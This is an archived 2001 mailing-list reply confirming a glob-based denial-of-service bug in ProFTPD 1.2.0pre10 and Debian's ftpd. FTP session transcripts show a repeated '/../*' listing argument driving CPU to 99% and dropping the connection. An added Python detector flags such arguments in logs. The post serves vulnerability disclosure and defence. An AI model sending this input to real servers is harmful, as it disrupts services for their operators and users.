At 00:43 21-8-2001, you wrote:
>Couldn't reproduce on Debian 2.2....
>
>isp-server-03:/# proftpd -v
> - ProFTPD Version 1.2.0pre10

I tested it on my Debian 2.2 machine and:

:/# proftpd -v
 - ProFTPD Version 1.2.0pre10

Verbonden met .
220 ProFTPD 1.2.0pre10 Server (Debian) []
Gebruiker ( :(none)):
331 Password required for .
Wachtwoord:
230 User logged in.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 No files found.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
Verbinding verbroken door externe host.
ftp>

CPU goes to 99.1 % and after the second attempt the connection to the server is broken.

Debian 2.2 ftpd 0.11-8potato.1 is vulnerable too:

Verbonden met .
220 FTP server (Version 6.2/OpenBSD/Linux-0.10) ready.
Gebruiker ( :(none)):
331 Password required for .
Wachtwoord:
230- Linux 2.2.19pre17 #1 Tue Mar 13 22:37:59 EST 2001 i686 unknown
230-
230 User logged in.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 not found
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
Verbinding verbroken door externe host.
ftp>

CPU goes to 99.1 % and after the second attempt the connection to the server is broken.
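
A defensive check for the listing argument seen in the sessions above, as an added example that is not part of the original post: it counts wildcard and `..` path segments in FTP listing commands and flags arguments over a limit. The log line format, the limits and the function names are assumptions made for this example.

```python
import re

# Assumed policy limits for this example; tune to what legitimate clients send.
MAX_WILDCARD_SEGMENTS = 3
MAX_PARENT_SEGMENTS = 2
LISTING_VERBS = {"LIST", "NLST", "STAT"}
GLOB_CHARS = re.compile(r"[*?\[{]")

def glob_cost(arg):
    """Count path segments containing glob metacharacters and '..' segments."""
    segments = [s for s in arg.split("/") if s]
    wildcards = sum(1 for s in segments if GLOB_CHARS.search(s))
    parents = sum(1 for s in segments if s == "..")
    return wildcards, parents

def is_suspicious(arg):
    """True when either count exceeds the assumed limits above."""
    wildcards, parents = glob_cost(arg)
    return wildcards > MAX_WILDCARD_SEGMENTS or parents > MAX_PARENT_SEGMENTS

def flag_commands(lines):
    """Return (client, verb, wildcards, parents) for listing commands over the limits.
    Expects constructed lines of the form '<client> <VERB> <argument>'."""
    hits = []
    for line in lines:
        parts = line.strip().split(None, 2)
        if len(parts) < 3 or parts[1].upper() not in LISTING_VERBS:
            continue
        client, verb, arg = parts
        if is_suspicious(arg):
            hits.append((client, verb.upper(), *glob_cost(arg)))
    return hits

# Constructed sample input (documentation addresses), not taken from a real log.
SAMPLE_LOG = [
    "192.0.2.10 NLST /pub/*.tar.gz",
    "192.0.2.10 RETR /pub/README",
    "192.0.2.77 NLST " + "/../*" * 13,
    "192.0.2.10 LIST -la /home/*/public_html",
]

if __name__ == "__main__":
    for hit in flag_commands(SAMPLE_LOG):
        print("flagged: client=%s verb=%s wildcards=%d parents=%d" % hit)
```

The same counting can be applied server-side to reject a listing argument before it is handed to the glob routine.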
This archive was generated by hypermail 2b30 : Mon Aug 20 2001 - 16:52:27 PDT